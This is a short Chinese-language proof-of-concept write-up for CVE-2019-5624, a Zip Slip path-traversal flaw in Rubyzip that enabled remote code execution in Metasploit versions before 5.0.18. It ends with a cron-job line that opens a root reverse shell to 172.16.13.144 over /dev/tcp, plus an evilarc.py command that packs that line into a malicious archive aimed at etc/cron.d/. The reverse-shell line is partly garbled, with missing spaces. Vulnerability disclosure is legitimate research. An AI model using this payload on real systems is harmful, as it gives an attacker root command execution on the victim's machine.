
针对Metasploit的CVE-2019-5624漏洞(Rubyzip不安全的ZIP处理导致RCE)的概念验证
Metasploit 的 CVE-2019-5624 漏洞的概念验证 (Rubyzip 不安全的 ZIP 处理导致远程代码执行)
2019年2月,我在 Rubyzip 库中发现了一个新漏洞。它允许攻击者利用不安全的 ZIP 处理(Zip Slip)导致远程命令执行。
该漏洞被用于攻击所有低于5.0.18版本的Metasploit(见Metasploit Wrap-Up)
我写了一篇详细的博客文章解释了该漏洞。
* * * * * root /bin/bash -c "exec /bin/bash0</dev/tcp/172.16.13.144/4444 1>&0 2>&0 0<&196;exec196<>/dev/tcp/172.16.13.144/4445; bash <&196 >&196 2>&196"
python evilarc.py exploit --os unix -p etc/cron.d/